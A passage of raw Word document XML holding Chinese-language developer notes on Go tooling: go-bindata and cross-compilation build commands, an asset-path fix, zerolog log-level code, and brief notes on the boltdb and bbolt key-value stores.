          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7483A" w14:textId="77777777" w:rsidR="00176279" w:rsidRDefault="00176279" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go-bindata.exe -pkg config -o config/SecretDetection_rules.go config/default.toml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7484A" w14:textId="77777777" w:rsidR="00176279" w:rsidRDefault="00176279" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go build  -ldflags "-w -s"  -o http.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD2E3A" w14:textId="77777777" w:rsidR="00176279" w:rsidRDefault="00176279" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>set GOOS=linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49733DC3" w14:textId="77777777" w:rsidR="00176279" w:rsidRDefault="00176279" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>set GOARCH=amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535CBC1" w14:textId="651541BF" w:rsidR="004C452C" w:rsidRDefault="00176279" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go build -ldflags "-w -s" -o http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC69C5E" w14:textId="77777777" w:rsidR="00F761EF" w:rsidRDefault="00F761EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704F3B4F" w14:textId="5B5B3792" w:rsidR="00F842FB" w:rsidRDefault="00F842FB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以一下子</w:t>
      </w:r>
      <w:r w:rsidR="001B268C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="001B268C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>embed</w:t>
      </w:r>
      <w:r w:rsidR="001B268C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和执行</w:t>
      </w:r>
      <w:r w:rsidR="001B268C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="001B268C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工作一下子完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A818053" w14:textId="77777777" w:rsidR="001B268C" w:rsidRDefault="001B268C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2700D0" w14:textId="26E18BAC" w:rsidR="001B268C" w:rsidRPr="00501F99" w:rsidRDefault="00501F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是后来的问题是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用出现问题，以为以前不加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">onfig/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种目录名构建的，所以直接是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA481FD" w14:textId="30033D5E" w:rsidR="00501F99" w:rsidRDefault="00501F99" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>config</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Asset</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"default.toml"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A055C6F" w14:textId="5C00AE41" w:rsidR="00F761EF" w:rsidRDefault="00501F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包是什么名字，这里就得写什么名儿，应该更正如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD63429" w14:textId="77777777" w:rsidR="00B45DB6" w:rsidRDefault="00B45DB6" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>config</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Asset</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"config/default.toml"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603C58F3" w14:textId="77777777" w:rsidR="00501F99" w:rsidRPr="00B45DB6" w:rsidRDefault="00501F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD68147" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2A7CA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="370" w:name="_Toc159779821"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/spf13/pflag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w14:paraId="3BFCCFE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBFFA4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF236B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="_Toc159779822"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/rs/zerolog</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p w14:paraId="3629BCC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B33BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3CF4FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">imporrt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F5637" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB60AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"github.com/rs/zerolog"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E8F835" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"github.com/rs/zerolog/log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E86F2FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2445F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9D438A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>switch strings.ToLower(ll) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>case "trace":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.TraceLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>case "debug":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.DebugLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>case "info":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.InfoLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>case "warn":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.WarnLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>case "err", "error":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.ErrorLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>case "fatal":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.FatalLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>default:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zerolog.SetGlobalLevel(zerolog.InfoLevel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5834D60E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E04B784" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16013A64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log.Debug().Msgf("executing: %s", cmd.String())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829D67C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log.Info().Msg("This message appears when log level set to Debug or Info")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081629D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log.Warn().Msg(scanner.Text())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554EF770" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>log.Fatal().Msg(err.Error())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51776C96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log.Error().Msg(scanner.Text())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D9BB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9BCAE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC38025" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A17D3E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F28EAD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC5C3EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FA06C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="_Toc159779823"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/boltdb/bolt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
    </w:p>
    <w:p w14:paraId="52E2FC86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌入式数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LMDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lightning Memory-Mapped Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE80A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.symas.com/lmdb/technical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069AC763" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LMDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库不是个概念，是个现成的数据库，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仿照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LMDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的思维去写了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADFDB55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78EE38D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/boltdb/bolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606D4AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的概念，有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个是一大堆键值队的集合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A3C48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://juejin.cn/post/6844903566943977485</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C874F8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E03B34F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="_Toc159779824"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.etcd.io/bbolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存储键值对，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
    </w:p>
    <w:p w14:paraId="3F02A46F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
